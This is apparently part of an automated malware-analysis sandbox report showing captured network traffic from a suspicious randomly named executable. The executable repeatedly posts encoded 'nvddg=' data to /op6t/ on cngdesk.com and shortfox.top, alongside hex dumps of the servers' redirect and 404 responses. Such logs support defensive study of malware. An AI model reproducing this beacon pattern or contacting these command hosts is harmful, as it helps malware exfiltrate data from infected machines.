                                                                        Data Ascii: nvddg=M3POp1NEKYhG3Sc7dtvZhhpj7cFQ1A+JYmdb/oCUxPPYJbPhKCyp/B5gjAyVkkZcG2HQ6j/TVerUbnDSoMamfOnd2WcEudo4gjRFrYNOKuItX1OdJk/87Z7ceuDmLYdor5nl2zalOVpt2BonOZneYd6qEEQpmrjNP14f0zy4sApD2dEyM+R51oUvqryQ8acLR8SDWy7ghP+vBL3lljJ2Bvo=
                                                                        May 22, 2024 17:32:51.156186104 CEST354INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:32:50 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.11.304981147.243.134.243807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:32:53.827625990 CEST1690OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.cngdesk.com
                                                                        Origin: http://www.cngdesk.com
                                                                        Referer: http://www.cngdesk.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 4d 33 50 4f 70 31 4e 45 4b 59 68 47 33 53 63 37 64 74 76 5a 68 68 70 6a 37 63 46 51 31 41 2b 4a 59 6d 64 62 2f 6f 43 55 78 50 48 59 4a 70 58 68 46 42 71 70 38 42 35 67 67 41 79 55 6b 6b 5a 42 47 32 50 55 36 6a 79 6f 56 63 54 55 5a 42 2f 53 2f 70 6d 6d 57 4f 6e 64 70 47 63 42 67 39 70 67 67 6a 42 42 72 59 64 4f 4b 75 49 74 58 33 36 64 66 47 62 38 39 5a 37 64 5a 75 44 36 50 59 64 51 72 34 50 54 32 7a 76 53 4f 45 4a 74 32 68 34 6e 4d 71 66 65 55 64 36 73 44 45 51 4c 6d 72 2f 73 50 31 6b 31 30 7a 47 47 73 48 6c 44 79 4a 74 47 5a 50 64 32 68 62 67 4e 33 5a 36 4f 34 61 77 41 50 62 4c 76 63 43 2f 64 6e 65 57 39 47 4e 6a 4c 35 53 68 4f 41 76 65 7a 54 76 63 53 65 6d 6f 51 4b 43 36 72 62 44 71 38 47 38 56 61 55 55 37 6c 77 76 6c 56 64 4b 74 35 42 62 36 46 42 33 50 6b 7a 6a 5a 59 42 33 59 6b 59 58 78 69 37 41 75 6c 48 72 54 6f 39 76 2f 39 43 51 5a 74 50 69 6d 4c 36 57 54 50 6a 66 59 6f 4f 52 4a 35 73 69 4e 4d 6b 47 65 43 31 4f 49 2f 4a 39 42 4f 70 43 62 73 62 6e 37 68 79 43 59 2f 73 4b 5a 30 [TRUNCATED]
                                                                        Data Ascii: nvddg=M3POp1NEKYhG3Sc7dtvZhhpj7cFQ1A+JYmdb/oCUxPHYJpXhFBqp8B5ggAyUkkZBG2PU6jyoVcTUZB/S/pmmWOndpGcBg9pggjBBrYdOKuItX36dfGb89Z7dZuD6PYdQr4PT2zvSOEJt2h4nMqfeUd6sDEQLmr/sP1k10zGGsHlDyJtGZPd2hbgN3Z6O4awAPbLvcC/dneW9GNjL5ShOAvezTvcSemoQKC6rbDq8G8VaUU7lwvlVdKt5Bb6FB3PkzjZYB3YkYXxi7AulHrTo9v/9CQZtPimL6WTPjfYoORJ5siNMkGeC1OI/J9BOpCbsbn7hyCY/sKZ0SRO1t9Xxl96CYvvaCkEvMypKy4S5BnL0bLfg8Bl/SglY4YLQwQg+u/rDqGxAYd9yGFeditJ+8JZVbL3bwSNskfx1/x1QHbzGa0qSjKMzklYYhdf9BDj6EX8snlYelzCIE/kNu3ze1RHNaT+IhSLckqD6OwwclPSACyvoZjXZXdkbPy68rx+Q6cG/TDR8/gRj5ZU3ufewX0+6zfF00/VvX/B/873ZreuJ/Ys4rph0WKrupkPJI8+SBYsFdizjVSEZ9NatkFjW/hekJjPrfB3S550UMrM3KaAQm1jNKOiyYgfy0qFEc0lCu/eSbwtd7lnLH6S3/aKTAyb3acRTI3gNQkxqaPNf13lTcFRy0IvEO93OE1AW/BgO/UGFKi/pI1y09T8aJcHFrFCzKK5NPoEPm3+DlhTIFUbCoiZ6NrFfHHQMcpWv44FHaompwnBkwZHFwcCyoJCYq21u5QbgcnAmE1NJu3VYusZHiBkcCyL6lXROkwZQwWBYgp9x9dAlaWN6k2fBWM1WhfaY1zV64sZOaAsgzMhvAyvOxyAP6euIhq2fBKBe6vbKLsEU+S4LjnaISKMJsZfeUiRB6g6WA19CkmfPLKGz7EOFW50KpIBq1WMESFMzDiu+wZlAORVYHHy9tyeoNkHr2QF5JBeme3UBo/KEYsfWKNR2Bd [TRUNCATED]
                                                                        May 22, 2024 17:32:54.304582119 CEST354INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:32:54 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.11.304981247.243.134.243807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:32:56.756414890 CEST484OUTGET /op6t/?x2=wN2xY&nvddg=B1nuqD59UoVahAAaaPrLlCdA9edg7gWIZ1BY+KXGwtiEVaDOMCSD80sEnTK1l1I1d32+6CzQNcHoayq10cGYYZnPmWF+i7E8hCdylepAFYAEUUK5dUTY9b4= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.cngdesk.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:32:57.196403027 CEST490INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:32:57 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/?x2=wN2xY&nvddg=B1nuqD59UoVahAAaaPrLlCdA9edg7gWIZ1BY+KXGwtiEVaDOMCSD80sEnTK1l1I1d32+6CzQNcHoayq10cGYYZnPmWF+i7E8hCdylepAFYAEUUK5dUTY9b4=
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.11.3049813203.161.49.193807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:33:03.263103962 CEST756OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.shortfox.top
                                                                        Origin: http://www.shortfox.top
                                                                        Referer: http://www.shortfox.top/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 35 50 61 55 2b 78 71 33 4d 68 79 57 4e 6f 38 4a 6c 61 61 4e 42 5a 64 2f 42 55 39 5a 6b 75 56 56 43 46 71 38 69 38 4d 37 49 4b 66 4c 59 54 44 6e 6a 53 68 59 79 32 77 73 30 33 79 64 76 73 77 46 4a 68 44 58 45 68 41 55 2b 52 35 62 4b 2b 59 36 63 71 71 46 6f 4e 42 2b 69 6d 7a 75 65 65 33 2b 4c 44 68 4b 33 52 5a 5a 2f 2f 41 73 78 6a 43 31 73 4b 6b 66 76 55 71 36 38 74 39 79 6e 35 48 50 51 79 4f 71 42 45 33 4d 76 6c 6c 71 39 72 4c 30 55 2b 49 6c 46 34 47 35 57 39 6f 67 35 6e 63 39 52 32 59 63 46 63 61 78 41 38 70 34 7a 5a 6f 77 2f 32 73 36 36 2f 45 36 48 76 72 65 71 6d 6a 45 63 41 3d 3d
                                                                        Data Ascii: nvddg=5PaU+xq3MhyWNo8JlaaNBZd/BU9ZkuVVCFq8i8M7IKfLYTDnjShYy2ws03ydvswFJhDXEhAU+R5bK+Y6cqqFoNB+imzuee3+LDhK3RZZ//AsxjC1sKkfvUq68t9yn5HPQyOqBE3Mvllq9rL0U+IlF4G5W9og5nc9R2YcFcaxA8p4zZow/2s66/E6HvreqmjEcA==
                                                                        May 22, 2024 17:33:03.482141018 CEST533INHTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:03 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.11.3049814203.161.49.193807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:33:05.996160030 CEST776OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.shortfox.top
                                                                        Origin: http://www.shortfox.top
                                                                        Referer: http://www.shortfox.top/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 35 50 61 55 2b 78 71 33 4d 68 79 57 4d 4a 73 4a 67 39 4f 4e 49 5a 64 34 64 6b 39 5a 71 4f 56 52 43 46 6d 38 69 39 4a 6d 49 35 37 4c 59 32 2f 6e 69 54 68 59 68 47 77 73 67 6e 79 63 33 4d 77 30 4a 68 48 31 45 68 38 55 2b 52 46 62 4b 37 38 36 63 5a 43 47 6f 64 42 38 71 47 7a 6f 51 2b 33 2b 4c 44 68 4b 33 56 78 7a 2f 2f 59 73 78 54 79 31 73 75 49 41 6c 30 71 6c 71 39 39 79 6a 35 48 4c 51 79 4f 49 42 48 79 70 76 67 68 71 39 71 37 30 55 4d 77 6d 4f 34 48 38 5a 64 70 7a 33 58 5a 71 4a 45 35 78 55 2b 50 75 42 4d 6f 44 79 4f 5a 71 69 31 59 34 70 66 34 58 62 75 47 32 6f 6b 69 66 42 41 39 51 63 37 44 77 78 78 54 4a 72 77 59 49 2f 57 6a 6f 52 6b 77 3d
                                                                        Data Ascii: nvddg=5PaU+xq3MhyWMJsJg9ONIZd4dk9ZqOVRCFm8i9JmI57LY2/niThYhGwsgnyc3Mw0JhH1Eh8U+RFbK786cZCGodB8qGzoQ+3+LDhK3Vxz//YsxTy1suIAl0qlq99yj5HLQyOIBHypvghq9q70UMwmO4H8Zdpz3XZqJE5xU+PuBMoDyOZqi1Y4pf4XbuG2okifBA9Qc7DwxxTJrwYI/WjoRkw=
                                                                        May 22, 2024 17:33:06.214934111 CEST533INHTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:06 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.11.3049815203.161.49.193807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:33:08.728420973 CEST1693OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.shortfox.top
                                                                        Origin: http://www.shortfox.top
                                                                        Referer: http://www.shortfox.top/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 35 50 61 55 2b 78 71 33 4d 68 79 57 4d 4a 73 4a 67 39 4f 4e 49 5a 64 34 64 6b 39 5a 71 4f 56 52 43 46 6d 38 69 39 4a 6d 49 35 7a 4c 5a 45 48 6e 6b 77 4a 59 69 47 77 73 38 58 79 52 33 4d 77 74 4a 6c 54 78 45 68 77 75 2b 55 42 62 4b 5a 30 36 4e 59 43 47 78 74 42 38 31 32 7a 70 65 65 33 76 4c 44 78 4f 33 52 56 7a 2f 2f 59 73 78 56 2b 31 6c 61 6b 41 6a 30 71 36 38 74 39 6d 6e 35 48 7a 51 79 57 79 42 45 65 54 75 55 56 71 2b 4b 72 30 57 5a 6b 6d 4d 59 48 79 4e 39 6f 30 33 57 6b 74 4a 45 6b 64 55 2f 71 42 42 4d 51 44 32 5a 77 43 2f 57 55 77 7a 63 77 45 55 62 76 4d 6e 43 4f 4e 4a 67 56 67 57 4c 54 4a 6e 69 44 46 77 48 67 6f 6b 48 72 78 53 42 35 46 4a 37 57 61 54 73 68 6c 37 73 6f 31 56 5a 61 38 2f 64 65 45 41 39 70 6e 78 6f 63 51 2b 2f 6f 37 6a 35 77 78 75 41 51 62 42 53 63 4a 32 57 74 42 50 6c 48 33 72 43 4c 62 53 49 4e 71 71 38 57 51 7a 72 6e 70 32 35 44 6d 52 47 6b 7a 78 6d 75 76 53 69 62 7a 2b 4c 50 4f 5a 61 6e 39 4b 52 78 73 35 77 2b 37 78 79 5a 49 6f 4d 36 73 46 73 30 5a 34 34 6a 50 [TRUNCATED]
                                                                        Data Ascii: nvddg=5PaU+xq3MhyWMJsJg9ONIZd4dk9ZqOVRCFm8i9JmI5zLZEHnkwJYiGws8XyR3MwtJlTxEhwu+UBbKZ06NYCGxtB812zpee3vLDxO3RVz//YsxV+1lakAj0q68t9mn5HzQyWyBEeTuUVq+Kr0WZkmMYHyN9o03WktJEkdU/qBBMQD2ZwC/WUwzcwEUbvMnCONJgVgWLTJniDFwHgokHrxSB5FJ7WaTshl7so1VZa8/deEA9pnxocQ+/o7j5wxuAQbBScJ2WtBPlH3rCLbSINqq8WQzrnp25DmRGkzxmuvSibz+LPOZan9KRxs5w+7xyZIoM6sFs0Z44jPx1lLTcLLrJCByrEVjmQyxKdpPq/PzMCzg9r7COTjnB0RhLse8hUIeftYIrsaFnQHstuIlf3jCLq7NEBxz6o3u9Ix8H0CBnBONfDilU/Y018o25BEphT7ypGXXbOeryO5e/YPyRmKFrxN5BbIIzoLosFqUTWCqsrI1BucYKqZJk7UY5vMslXDALXTQK+HmfckVSFFSoulZonsi5pgA3TEgSelt7rTf1+NuQfcK62LK1OXLWsJkErSMo+TZhA614jnAs2A2ZOJPFMWlh2TIJ5dsakODt7rWViFhifL69A2FZhsqG6+TSxNWxoyW6ow4zCcSfddYYqDXVXQrL9i7KfmPG+AxYtz56AHgo0l56dnyjGuLwDxKOe6iLdaQDj8zm7xPbyWQbn/2C360FnAh2zyQRCM81sqXUTF5sWOuBE1LeTxZ5ONf0zNEhQgB9tlyYiJiIHMxzactbjwzrP5xNqC+2zOIAj7pptAkflXZCM76/YQloS0mpuyaPNQwNpey6oQAorNqIkvYO2W281xaNyuDQr9WU6hjBTQRhsc14pc1/f1hf9F2W70Ro8AJC02wOJ5rt+IGelyp7zOCn2BXi4Mgpj4VQoFN8pjlaEZMcgohmbQb0tdQKiVGzdFYedxU9NSfTDR9B9Iak2mD0god+6/rhqIH5jCLeTHW9 [TRUNCATED]
                                                                        May 22, 2024 17:33:08.948518991 CEST533INHTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:08 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.11.3049816203.161.49.193807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:33:11.463862896 CEST485OUTGET /op6t/?nvddg=0Ny09Eq8ZBefbKkvkqaUMIZRDRlNq5VNIHijnsMzF4DJMnHDgghZ+20Zz3OB9IxSUXOfCxAz72VlILBCQfa8jvMelkWZW+WeIhBsswld1octwAWuto44rRQ=&x2=wN2xY HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.shortfox.top
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:33:11.690143108 CEST548INHTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:11 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
